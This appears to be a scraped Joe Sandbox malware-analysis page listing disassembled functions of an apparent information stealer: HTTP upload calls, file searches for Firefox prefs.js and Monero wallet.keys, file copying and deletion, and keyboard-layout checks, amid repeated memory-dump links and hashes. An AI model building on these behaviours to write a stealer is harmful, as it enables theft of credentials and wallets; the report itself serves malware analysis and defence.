Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: fcd19c0432803a194cf48dddc57f89a48b2db7d8d16b918425b6e23fd8728032
Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
Opcode Fuzzy Hash: fcd19c0432803a194cf48dddc57f89a48b2db7d8d16b918425b6e23fd8728032
Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5

Function 00544880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
StrCmpCA.SHLWAPI(?,0127E570), ref: 0054493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0127E4E0), ref: 00544DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
InternetCloseHandle.WININET(00000000), ref: 00544EAD
InternetCloseHandle.WININET(00000000), ref: 00544EC5
HttpOpenRequestA.WININET(00000000,0127E580,?,0127DDD8,00000000,00000000,00400100,00000000), ref: 00544B15

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

InternetCloseHandle.WININET(00000000), ref: 00544ECF

Strings

", xrefs: 00544BF2
------, xrefs: 00544C69
", xrefs: 00544D33
------, xrefs: 00544B28
------, xrefs: 005449BD

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: ff2f9c9b9ca9d18b6fccf73b4ccd700999c6842135281a06bc1abb91f70e0adf
Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
Opcode Fuzzy Hash: ff2f9c9b9ca9d18b6fccf73b4ccd700999c6842135281a06bc1abb91f70e0adf
Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66

Function 00553EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00553EC3
FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
FindClose.KERNEL32(000000FF), ref: 00554081

Strings

%s\%s, xrefs: 00553EB7

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: d7c745ddf24546f53621ea992e98e7863b1a3933d2263048243206c18a3c61db
Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
Opcode Fuzzy Hash: d7c745ddf24546f53621ea992e98e7863b1a3933d2263048243206c18a3c61db
Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65

Function 0054F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0054FAB1
FindClose.KERNEL32(000000FF), ref: 0054FAC3

Strings

prefs.js, xrefs: 0054F812

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 1b7f0d2b6a4de24792b10ab0d9c714766f43532aeaf7327ace51ef21e0da5382
Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
Opcode Fuzzy Hash: 1b7f0d2b6a4de24792b10ab0d9c714766f43532aeaf7327ace51ef21e0da5382
Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92

Function 005416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
DeleteFileA.KERNEL32(00000000), ref: 00541DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
FindClose.KERNEL32(000000FF), ref: 00541E32

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Strings

\*.*, xrefs: 005417F1

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: c4259bd06f37971f5b6d7f4fde248cba5ffa800a71c59db82ffe59f56a666369
Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
Opcode Fuzzy Hash: c4259bd06f37971f5b6d7f4fde248cba5ffa800a71c59db82ffe59f56a666369
Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91

Function 0054DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0054DDCC
FindClose.KERNEL32(000000FF), ref: 0054DDDE

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: e6bc77c1584e44cd4474d23a317eeca7b85e67108a47e8e37f20831abccd0ca7
Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
Opcode Fuzzy Hash: e6bc77c1584e44cd4474d23a317eeca7b85e67108a47e8e37f20831abccd0ca7
Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2

Function 00557B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
LocalFree.KERNEL32(00000000), ref: 00557D22

Strings

/ , xrefs: 00557C7F

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61

Function 0054E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF

Strings

\*.*, xrefs: 0054E44D

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

